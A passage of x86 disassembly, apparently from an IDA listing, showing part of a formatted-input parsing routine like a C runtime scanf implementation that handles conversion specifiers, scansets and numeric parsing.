loc_409486: ; CODE XREF: sub_409217+24Ej
dec [ebp+18Ch+var_19A]
dec [ebp+18Ch+var_191]
loc_40948C: ; CODE XREF: sub_409217+1D0j
; sub_409217+1DAj ...
cmp [ebp+18Ch+var_189], 0
jz loc_4093C5
cmp [ebp+18Ch+var_199], 0
mov [ebp+18Ch+var_1B4], edi
jnz short loc_4094AD
mov eax, [ebp+18Ch+var_1E4]
mov esi, [eax]
mov [ebp+18Ch+var_1FC], eax
add eax, 4
mov [ebp+18Ch+var_1E4], eax
loc_4094AD: ; CODE XREF: sub_409217+286j
cmp [ebp+18Ch+var_191], 0
mov [ebp+18Ch+var_1C4], esi
mov [ebp+18Ch+var_189], 0
jnz short loc_4094CC
mov al, [edi]
cmp al, 53h
jz short loc_4094C8
cmp al, 43h
mov [ebp+18Ch+var_191], 0FFh
jnz short loc_4094CC
loc_4094C8: ; CODE XREF: sub_409217+2A7j
mov [ebp+18Ch+var_191], 1
loc_4094CC: ; CODE XREF: sub_409217+2A1j
; sub_409217+2AFj
movzx ebx, byte ptr [edi]
or ebx, 20h
cmp ebx, 6Eh
mov [ebp+18Ch+var_1AC], ebx
jz short loc_40950F
cmp ebx, 63h
jz short loc_4094F2
cmp ebx, 7Bh
jz short loc_4094F2
push [ebp+18Ch+var_1A0]
lea esi, [ebp+18Ch+var_188]
call sub_4091F2
pop ecx
jmp short loc_4094FD
; ---------------------------------------------------------------------------
loc_4094F2: ; CODE XREF: sub_409217+2C6j
; sub_409217+2CBj
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
loc_4094FD: ; CODE XREF: sub_409217+2D9j
cmp eax, 0FFFFFFFFh
mov [ebp+18Ch+var_190], eax
jz loc_409E09
mov esi, [ebp+18Ch+var_1C4]
mov edi, [ebp+18Ch+var_1B4]
loc_40950F: ; CODE XREF: sub_409217+2C1j
mov ecx, [ebp+18Ch+var_1B8]
test ecx, ecx
jz short loc_409520
cmp [ebp+18Ch+var_198], 0
jz loc_409DE1
loc_409520: ; CODE XREF: sub_409217+2FDj
cmp ebx, 6Fh
jg loc_40992C
jz loc_409B57
cmp ebx, 63h
jz loc_40981E
push 64h
pop eax
cmp ebx, eax
jz loc_409B57
jle loc_409956
cmp ebx, 67h
jle short loc_409586
cmp ebx, 69h
jz short loc_40956E
cmp ebx, 6Eh
jnz loc_409956
cmp [ebp+18Ch+var_199], 0
mov edi, [ebp+18Ch+var_188]
jz loc_409D51
jmp loc_409D71
; ---------------------------------------------------------------------------
loc_40956E: ; CODE XREF: sub_409217+33Aj
mov [ebp+18Ch+var_1AC], eax
loc_409571: ; CODE XREF: sub_409217+734j
mov ebx, [ebp+18Ch+var_190]
cmp ebx, 2Dh
jnz loc_409A3F
mov [ebp+18Ch+var_1A3], 1
jmp loc_409A44
; ---------------------------------------------------------------------------
loc_409586: ; CODE XREF: sub_409217+335j
xor ebx, ebx
cmp [ebp+18Ch+var_190], 2Dh
jnz short loc_409597
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [eax], 2Dh
inc ebx
jmp short loc_40959D
; ---------------------------------------------------------------------------
loc_409597: ; CODE XREF: sub_409217+375j
cmp [ebp+18Ch+var_190], 2Bh
jnz short loc_4095AE
loc_40959D: ; CODE XREF: sub_409217+37Ej
dec [ebp+18Ch+var_198]
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_190], eax
loc_4095AE: ; CODE XREF: sub_409217+384j
cmp [ebp+18Ch+var_1B8], 0
jnz short loc_4095B8
or [ebp+18Ch+var_198], 0FFFFFFFFh
loc_4095B8: ; CODE XREF: sub_409217+39Bj
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_409605
; ---------------------------------------------------------------------------
loc_4095BE: ; CODE XREF: sub_409217+3F7j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_409610
mov al, byte ptr [ebp+18Ch+var_190]
mov ecx, [ebp+18Ch+var_1B0]
inc [ebp+18Ch+var_1A8]
mov [ebx+ecx], al
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_409605: ; CODE XREF: sub_409217+3A5j
push eax
call sub_40F52F
test eax, eax
pop ecx
jnz short loc_4095BE
loc_409610: ; CODE XREF: sub_409217+3AFj
mov eax, [ebp+18Ch+var_1F8]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
cmp al, byte ptr [ebp+18Ch+var_190]
mov [ebp+18Ch+var_1A4], al
jnz loc_4096C6
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_4096C6
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ecx, [ebp+18Ch+var_1B0]
mov [ebp+18Ch+var_190], eax
mov al, [ebp+18Ch+var_1A4]
mov [ebx+ecx], al
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_4096BB
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_409217+4ADj
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_4096C6
mov eax, [ebp+18Ch+var_1B0]
mov cl, byte ptr [ebp+18Ch+var_190]
inc [ebp+18Ch+var_1A8]
mov [ebx+eax], cl
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_4096BB: ; CODE XREF: sub_409217+45Bj
push eax
call sub_40F52F
test eax, eax
pop ecx
jnz short loc_409674
loc_4096C6: ; CODE XREF: sub_409217+40Cj
; sub_409217+41Aj ...
cmp [ebp+18Ch+var_1A8], 0
jz loc_4097C6
cmp [ebp+18Ch+var_190], 65h
jz short loc_4096E0
cmp [ebp+18Ch+var_190], 45h
jnz loc_4097C6
loc_4096E0: ; CODE XREF: sub_409217+4BDj
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_4097C6
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [ebx+eax], 65h
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
cmp eax, 2Dh
mov [ebp+18Ch+var_190], eax
jnz short loc_40974B
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [ebx+eax], 2Dh
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
jmp short loc_409751
; ---------------------------------------------------------------------------
loc_40974B: ; CODE XREF: sub_409217+50Fj
cmp [ebp+18Ch+var_190], 2Bh
jnz short loc_40976E
loc_409751: ; CODE XREF: sub_409217+532j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jnz short loc_409760
and [ebp+18Ch+var_198], eax
jmp short loc_40976E
; ---------------------------------------------------------------------------
loc_409760: ; CODE XREF: sub_409217+542j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_190], eax
loc_40976E: ; CODE XREF: sub_409217+538j
; sub_409217+547j
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_4097BB
; ---------------------------------------------------------------------------
loc_409774: ; CODE XREF: sub_409217+5ADj
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_4097C6
mov eax, [ebp+18Ch+var_1B0]
mov cl, byte ptr [ebp+18Ch+var_190]
inc [ebp+18Ch+var_1A8]
mov [ebx+eax], cl
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_409188
add esp, 0Ch
test eax, eax
jz loc_409E09
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_4097BB: ; CODE XREF: sub_409217+55Bj
push eax
call sub_40F52F
test eax, eax
pop ecx
jnz short loc_409774
loc_4097C6: ; CODE XREF: sub_409217+4B3j
; sub_409217+4C3j ...
dec [ebp+18Ch+var_188]
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jz short loc_4097DC
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F64F
pop ecx
pop ecx
loc_4097DC: ; CODE XREF: sub_409217+5B6j
cmp [ebp+18Ch+var_1A8], 0
jz loc_409E09
cmp [ebp+18Ch+var_199], 0
jnz loc_409D71
mov eax, [ebp+18Ch+var_1B0]
inc [ebp+18Ch+var_1C8]
lea ecx, [ebp+18Ch+var_1F8]
push ecx
push eax
push [ebp+18Ch+var_1C4]
mov byte ptr [ebx+eax], 0
movsx eax, [ebp+18Ch+var_19A]
dec eax
push eax
push off_423F9C
call sub_405543
pop ecx
call eax
add esp, 10h
jmp loc_409D71
; ---------------------------------------------------------------------------
loc_40981E: ; CODE XREF: sub_409217+31Bj
test ecx, ecx
jnz short loc_40982C
inc [ebp+18Ch+var_198]
mov [ebp+18Ch+var_1B8], 1
loc_40982C: ; CODE XREF: sub_409217+609j
; sub_409217+723j
cmp [ebp+18Ch+var_191], 0
jle short loc_409836
mov [ebp+18Ch+var_1A2], 1
loc_409836: ; CODE XREF: sub_409217+619j
; sub_409217+823j
dec [ebp+18Ch+var_188]
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
mov edi, esi
jz short loc_40984E
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F64F
pop ecx
pop ecx
loc_40984E: ; CODE XREF: sub_409217+628j
; sub_409217+8E6j ...
cmp [ebp+18Ch+var_1B8], 0
jz short loc_409862
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_409B1B
loc_409862: ; CODE XREF: sub_409217+63Bj
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
cmp eax, 0FFFFFFFFh
mov [ebp+18Ch+var_190], eax
jz loc_409B08
cmp ebx, 63h
jz short loc_4098C7
cmp ebx, 73h
jnz short loc_409896
cmp eax, 9
jl short loc_409891
cmp eax, 0Dh
jle loc_409B08
loc_409891: ; CODE XREF: sub_409217+66Fj
cmp eax, 20h
jnz short loc_4098C7
loc_409896: ; CODE XREF: sub_409217+66Aj
cmp ebx, 7Bh
jnz loc_409B08
movsx ebx, [ebp+18Ch+var_1A4]
xor edx, edx
mov ecx, eax
and ecx, 7
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+18Ch+var_24]
xor ecx, ebx
test edx, ecx
mov ebx, [ebp+18Ch+var_1AC]
jz loc_409B08
loc_4098C7: ; CODE XREF: sub_409217+665j
; sub_409217+67Dj
cmp [ebp+18Ch+var_199], 0
jnz loc_409B02
cmp [ebp+18Ch+var_1A2], 0
jz loc_409AF7
mov [ebp+18Ch+var_1DC], al
movzx eax, al
push eax
call sub_40CDE6
test eax, eax
pop ecx
jz short loc_4098FA
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov [ebp+18Ch+var_1DB], al
loc_4098FA: ; CODE XREF: sub_409217+6D3j
lea eax, [ebp+18Ch+var_1F8]
push eax
mov eax, [ebp+18Ch+var_1F8]
mov [ebp+18Ch+var_1E8], 3Fh
push dword ptr [eax+0ACh]
lea eax, [ebp+18Ch+var_1DC]
push eax
lea eax, [ebp+18Ch+var_1E8]
push eax
call sub_40F76D
mov ax, word ptr [ebp+18Ch+var_1E8]
add esp, 10h
mov [esi], ax
inc esi
inc esi
jmp loc_409AFA
; ---------------------------------------------------------------------------
loc_40992C: ; CODE XREF: sub_409217+30Cj
mov eax, ebx
sub eax, 70h
jz loc_409B53
sub eax, 3
jz loc_40982C
dec eax
dec eax
jz loc_409B57
sub eax, 3
jz loc_409571
sub eax, 3
jz short loc_40997A
loc_409956: ; CODE XREF: sub_409217+32Cj
; sub_409217+33Fj
movzx eax, byte ptr [edi]
cmp eax, [ebp+18Ch+var_190]
jnz loc_409DE1
dec [ebp+18Ch+var_1A1]
cmp [ebp+18Ch+var_199], 0
jnz loc_409D71
mov eax, [ebp+18Ch+var_1FC]
mov [ebp+18Ch+var_1E4], eax
jmp loc_409D71
; ---------------------------------------------------------------------------
loc_40997A: ; CODE XREF: sub_409217+73Dj
cmp [ebp+18Ch+var_191], 0
jle short loc_409984
mov [ebp+18Ch+var_1A2], 1
loc_409984: ; CODE XREF: sub_409217+767j
inc edi
cmp byte ptr [edi], 5Eh
mov esi, edi
jnz short loc_409993
lea esi, [edi+1]
mov [ebp+18Ch+var_1A4], 0FFh
loc_409993: ; CODE XREF: sub_409217+773j
push 20h
lea eax, [ebp+18Ch+var_24]
push 0
push eax
call sub_407F20
add esp, 0Ch
cmp byte ptr [esi], 5Dh
jnz short loc_4099B7
mov dl, 5Dh
inc esi
mov [ebp+18Ch+var_19], 20h
jmp short loc_409A26
; ---------------------------------------------------------------------------
loc_4099B7: ; CODE XREF: sub_409217+792j
mov dl, [ebp+18Ch+var_1C9]
jmp short loc_409A26
; ---------------------------------------------------------------------------
loc_4099BC: ; CODE XREF: sub_409217+813j
inc esi
cmp al, 2Dh
jnz short loc_409A09
test dl, dl
jz short loc_409A09
mov cl, [esi]
cmp cl, 5Dh
jz short loc_409A09
inc esi
cmp dl, cl
jnb short loc_4099D5
mov al, cl
jmp short loc_4099D9
; ---------------------------------------------------------------------------
loc_4099D5: ; CODE XREF: sub_409217+7B8j
mov al, dl
mov dl, cl
loc_4099D9: ; CODE XREF: sub_409217+7BCj
cmp dl, al
ja short loc_409A05
sub al, dl
inc al
movzx edi, dl
movzx edx, al
loc_4099E7: ; CODE XREF: sub_409217+7E9j
mov ecx, edi
and ecx, 7
mov eax, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+18Ch+var_24]
or [eax], bl
inc edi
dec edx
jnz short loc_4099E7
mov ebx, [ebp+18Ch+var_1AC]
loc_409A05: ; CODE XREF: sub_409217+7C4j
xor dl, dl
jmp short loc_409A26
; ---------------------------------------------------------------------------
loc_409A09: ; CODE XREF: sub_409217+7A8j
; sub_409217+7ACj ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+18Ch+var_24]
or [eax], bl
mov ebx, [ebp+18Ch+var_1AC]
loc_409A26: ; CODE XREF: sub_409217+79Ej
; sub_409217+7A3j ...
mov al, [esi]
cmp al, 5Dh
jnz short loc_4099BC
test al, al
jz loc_409E09
mov [ebp+18Ch+var_1B4], esi
mov esi, [ebp+18Ch+var_1C4]
jmp loc_409836
; ---------------------------------------------------------------------------
loc_409A3F: ; CODE XREF: sub_409217+360j
cmp ebx, 2Bh
jnz short loc_409A63
loc_409A44: ; CODE XREF: sub_409217+36Aj
dec [ebp+18Ch+var_198]
jnz short loc_409A53
test ecx, ecx
jz short loc_409A53
mov [ebp+18Ch+var_189], 1
jmp short loc_409A63
; ---------------------------------------------------------------------------
loc_409A53: ; CODE XREF: sub_409217+830j
; sub_409217+834j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
loc_409A63: ; CODE XREF: sub_409217+82Bj
; sub_409217+83Aj
cmp ebx, 30h
jnz loc_409B89
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
cmp bl, 78h
mov [ebp+18Ch+var_190], ebx
jz short loc_409AC8
cmp bl, 58h
jz short loc_409AC8
cmp [ebp+18Ch+var_1AC], 78h
mov [ebp+18Ch+var_1A8], 1
jz short loc_409AAD
cmp [ebp+18Ch+var_1B8], 0
jz short loc_409AA1
dec [ebp+18Ch+var_198]
jnz short loc_409AA1
inc [ebp+18Ch+var_189]
loc_409AA1: ; CODE XREF: sub_409217+880j
; sub_409217+885j
mov [ebp+18Ch+var_1AC], 6Fh
jmp loc_409B89
; ---------------------------------------------------------------------------
loc_409AAD: ; CODE XREF: sub_409217+87Aj
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_409AC0
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F64F
pop ecx
pop ecx
loc_409AC0: ; CODE XREF: sub_409217+89Cj
push 30h
pop ebx
jmp loc_409B86
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_409217+868j
; sub_409217+86Dj
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
cmp [ebp+18Ch+var_1B8], 0
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jz short loc_409AEB
sub [ebp+18Ch+var_198], 2
cmp [ebp+18Ch+var_198], 1
jge short loc_409AEB
inc [ebp+18Ch+var_189]
loc_409AEB: ; CODE XREF: sub_409217+8C5j
; sub_409217+8CFj
mov [ebp+18Ch+var_1AC], 78h
jmp loc_409B89
; ---------------------------------------------------------------------------
loc_409AF7: ; CODE XREF: sub_409217+6BEj
mov [esi], al
inc esi
loc_409AFA: ; CODE XREF: sub_409217+710j
mov [ebp+18Ch+var_1C4], esi
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409B02: ; CODE XREF: sub_409217+6B4j
inc edi
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409B08: ; CODE XREF: sub_409217+65Cj
; sub_409217+674j ...
dec [ebp+18Ch+var_188]
cmp eax, 0FFFFFFFFh
jz short loc_409B1B
push [ebp+18Ch+var_1A0]
push eax
call sub_40F64F
pop ecx
pop ecx
loc_409B1B: ; CODE XREF: sub_409217+645j
; sub_409217+8F7j
cmp edi, esi
jz loc_409E09
cmp [ebp+18Ch+var_199], 0
jnz loc_409D71
inc [ebp+18Ch+var_1C8]
cmp ebx, 63h
jz loc_409D71
cmp [ebp+18Ch+var_1A2], 0
mov eax, [ebp+18Ch+var_1C4]
jz short loc_409B4B
and word ptr [eax], 0
jmp loc_409D71
; ---------------------------------------------------------------------------
loc_409B4B: ; CODE XREF: sub_409217+929j
mov byte ptr [eax], 0
jmp loc_409D71
; ---------------------------------------------------------------------------
loc_409B53: ; CODE XREF: sub_409217+71Aj
mov [ebp+18Ch+var_19A], 1
loc_409B57: ; CODE XREF: sub_409217+312j
; sub_409217+326j ...
mov ebx, [ebp+18Ch+var_190]
cmp ebx, 2Dh
jnz short loc_409B65
mov [ebp+18Ch+var_1A3], 1
jmp short loc_409B6A
; ---------------------------------------------------------------------------
loc_409B65: ; CODE XREF: sub_409217+946j
cmp ebx, 2Bh
jnz short loc_409B89
loc_409B6A: ; CODE XREF: sub_409217+94Cj
dec [ebp+18Ch+var_198]
jnz short loc_409B79
test ecx, ecx
jz short loc_409B79
mov [ebp+18Ch+var_189], 1
jmp short loc_409B89
; ---------------------------------------------------------------------------
loc_409B79: ; CODE XREF: sub_409217+956j
; sub_409217+95Aj
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
loc_409B86: ; CODE XREF: sub_409217+8ACj
mov [ebp+18Ch+var_190], ebx
loc_409B89: ; CODE XREF: sub_409217+84Fj
; sub_409217+891j ...
cmp [ebp+18Ch+var_1D4], 0
jz loc_409C8E
cmp [ebp+18Ch+var_189], 0
jnz loc_409C69
loc_409B9D: ; CODE XREF: sub_409217+A3Aj
cmp [ebp+18Ch+var_1AC], 78h
jz short loc_409BF2
cmp [ebp+18Ch+var_1AC], 70h
jz short loc_409BF2
movzx eax, bl
push eax
call sub_40F52F
test eax, eax
pop ecx
jz loc_409C56
cmp [ebp+18Ch+var_1AC], 6Fh
jnz short loc_409BDC
cmp ebx, 38h
jge loc_409C56
mov eax, [ebp+18Ch+var_1BC]
mov esi, [ebp+18Ch+var_1C0]
shld eax, esi, 3
shl esi, 3
mov [ebp+18Ch+var_1BC], eax
jmp short loc_409C27
; ---------------------------------------------------------------------------
loc_409BDC: ; CODE XREF: sub_409217+9A8j
push 0
push 0Ah
push [ebp+18Ch+var_1BC]
push [ebp+18Ch+var_1C0]
call sub_40F8A0
mov esi, eax
mov [ebp+18Ch+var_1BC], edx
jmp short loc_409C27
; ---------------------------------------------------------------------------
loc_409BF2: ; CODE XREF: sub_409217+98Aj
; sub_409217+990j
movzx edi, bl
push edi
call sub_40F5AC
test eax, eax
pop ecx
jz short loc_409C56
mov eax, [ebp+18Ch+var_1BC]
mov esi, [ebp+18Ch+var_1C0]
shld eax, esi, 4
push edi
shl esi, 4
mov [ebp+18Ch+var_1BC], eax
call sub_40F52F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409C24
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409C24: ; CODE XREF: sub_409217+A05j
mov [ebp+18Ch+var_190], ebx
loc_409C27: ; CODE XREF: sub_409217+9C3j
; sub_409217+9D9j
inc [ebp+18Ch+var_1A8]
lea eax, [ebx-30h]
cdq
add esi, eax
adc [ebp+18Ch+var_1BC], edx
cmp [ebp+18Ch+var_1B8], 0
mov [ebp+18Ch+var_1C0], esi
jz short loc_409C41
dec [ebp+18Ch+var_198]
jz short loc_409C69
loc_409C41: ; CODE XREF: sub_409217+A23j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jmp loc_409B9D
; ---------------------------------------------------------------------------
loc_409C56: ; CODE XREF: sub_409217+99Ej
; sub_409217+9ADj ...
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_409C69
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F64F
pop ecx
pop ecx
loc_409C69: ; CODE XREF: sub_409217+980j
; sub_409217+A28j ...
cmp [ebp+18Ch+var_1A3], 0
mov edi, [ebp+18Ch+var_1E0]
jz loc_409D31
mov eax, [ebp+18Ch+var_1C0]
mov ecx, [ebp+18Ch+var_1BC]
neg eax
adc ecx, 0
neg ecx
mov [ebp+18Ch+var_1C0], eax
mov [ebp+18Ch+var_1BC], ecx
jmp loc_409D31
; ---------------------------------------------------------------------------
loc_409C8E: ; CODE XREF: sub_409217+976j
cmp [ebp+18Ch+var_189], 0
mov edi, [ebp+18Ch+var_1E0]
jnz loc_409D29
loc_409C9B: ; CODE XREF: sub_409217+AFDj
cmp [ebp+18Ch+var_1AC], 78h
jz short loc_409CCA
cmp [ebp+18Ch+var_1AC], 70h
jz short loc_409CCA
movzx eax, bl
push eax
call sub_40F52F
test eax, eax
pop ecx
jz short loc_409D16
cmp [ebp+18Ch+var_1AC], 6Fh
jnz short loc_409CC5
cmp ebx, 38h
jge short loc_409D16
shl edi, 3
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CC5: ; CODE XREF: sub_409217+AA2j
imul edi, 0Ah
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CCA: ; CODE XREF: sub_409217+A88j
; sub_409217+A8Ej
movzx esi, bl
push esi
call sub_40F5AC
test eax, eax
pop ecx
jz short loc_409D16
push esi
shl edi, 4
call sub_40F52F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409CEF
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409CEF: ; CODE XREF: sub_409217+AD0j
mov [ebp+18Ch+var_190], ebx
loc_409CF2: ; CODE XREF: sub_409217+AACj
; sub_409217+AB1j
inc [ebp+18Ch+var_1A8]
cmp [ebp+18Ch+var_1B8], 0
lea edi, [edi+ebx-30h]
jz short loc_409D04
dec [ebp+18Ch+var_198]
jz short loc_409D29
loc_409D04: ; CODE XREF: sub_409217+AE6j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jmp short loc_409C9B
; ---------------------------------------------------------------------------
loc_409D16: ; CODE XREF: sub_409217+A9Cj
; sub_409217+AA7j ...
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_409D29
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F64F
pop ecx
pop ecx
loc_409D29: ; CODE XREF: sub_409217+A7Ej
; sub_409217+AEBj ...
cmp [ebp+18Ch+var_1A3], 0
jz short loc_409D31
neg edi
loc_409D31: ; CODE XREF: sub_409217+A59j
; sub_409217+A72j ...
cmp [ebp+18Ch+var_1AC], 46h
jnz short loc_409D3B
and [ebp+18Ch+var_1A8], 0
loc_409D3B: ; CODE XREF: sub_409217+B1Ej
cmp [ebp+18Ch+var_1A8], 0
jz loc_409E09
cmp [ebp+18Ch+var_199], 0
jnz short loc_409D71
inc [ebp+18Ch+var_1C8]
mov esi, [ebp+18Ch+var_1C4]
loc_409D51: ; CODE XREF: sub_409217+34Cj
cmp [ebp+18Ch+var_1D4], 0
jz short loc_409D64
mov eax, [ebp+18Ch+var_1C0]
mov [esi], eax
mov eax, [ebp+18Ch+var_1BC]
mov [esi+4], eax
jmp short loc_409D71
; ---------------------------------------------------------------------------
loc_409D64: ; CODE XREF: sub_409217+B3Ej
cmp [ebp+18Ch+var_19A], 0
jz short loc_409D6E
mov [esi], edi
jmp short loc_409D71
; ---------------------------------------------------------------------------
loc_409D6E: ; CODE XREF: sub_409217+B51j
mov [esi], di
loc_409D71: ; CODE XREF: sub_409217+352j
; sub_409217+5D3j ...
mov edi, [ebp+18Ch+var_1B4]
inc [ebp+18Ch+var_1A1]
inc edi
mov [ebp+18Ch+var_1B4], edi
jmp short loc_409DBF
; ---------------------------------------------------------------------------
loc_409D7D: ; CODE XREF: sub_409217+17Cj
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
mov ebx, eax
movzx eax, byte ptr [edi]
inc edi
cmp eax, ebx
mov [ebp+18Ch+var_190], ebx
mov [ebp+18Ch+var_1B4], edi
jnz short loc_409DF7
movzx eax, bl
push eax
call sub_40CDE6
test eax, eax
pop ecx
jz short loc_409DBF
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_4091DC
movzx ecx, byte ptr [edi]
inc edi
cmp ecx, eax
mov [ebp+18Ch+var_1B4], edi
jnz short loc_409DE7
dec [ebp+18Ch+var_188]
loc_409DBF: ; CODE XREF: sub_409217+B64j
; sub_409217+B8Dj
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jnz short loc_409DD5
cmp byte ptr [edi], 25h
jnz short loc_409E09
mov eax, [ebp+18Ch+var_1B4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_409E09
mov edi, eax
loc_409DD5: ; CODE XREF: sub_409217+174j
; sub_409217+BACj
mov al, [edi]
test al, al
jnz loc_40934F
jmp short loc_409E09
; ---------------------------------------------------------------------------
loc_409DE1: ; CODE XREF: sub_409217+303j
; sub_409217+745j
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jmp short loc_409DFA
; ---------------------------------------------------------------------------
loc_409DE7: ; CODE XREF: sub_409217+BA3j
cmp eax, 0FFFFFFFFh
jz short loc_409DF7
push [ebp+18Ch+var_1A0]
push eax
call sub_40F64F
pop ecx
pop ecx
loc_409DF7: ; CODE XREF: sub_409217+B7Fj
; sub_409217+BD3j
cmp ebx, 0FFFFFFFFh
loc_409DFA: ; CODE XREF: sub_409217+BCEj
jz short loc_409E09
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F64F
pop ecx
pop ecx
loc_409E09: ; CODE XREF: sub_409217+2ECj
; sub_409217+3D7j ...
cmp [ebp+18Ch+var_1D0], 1
jnz short loc_409E18
push [ebp+18Ch+var_1B0]
call sub_4039CF
pop ecx
loc_409E18: ; CODE XREF: sub_409217+BF6j
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jnz short loc_409E3C
mov eax, [ebp+18Ch+var_1C8]
test eax, eax
jnz short loc_409E2D
cmp [ebp+18Ch+var_1A1], al
jnz short loc_409E2D
or eax, 0FFFFFFFFh
loc_409E2D: ; CODE XREF: sub_409217+C0Cj
; sub_409217+C11j
cmp [ebp+18Ch+var_1EC], 0
jz short loc_409E4C
mov ecx, [ebp+18Ch+var_1F0]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_409E4C
; ---------------------------------------------------------------------------
loc_409E3C: ; CODE XREF: sub_409217+12Fj
